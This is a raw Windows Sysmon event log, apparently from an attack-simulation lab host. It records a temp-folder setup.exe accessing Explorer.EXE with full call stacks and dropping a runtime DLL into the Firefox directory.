13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-string-l1-1-0.dll2021-01-18 13:59:52.239 10341000x800000000000000014543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
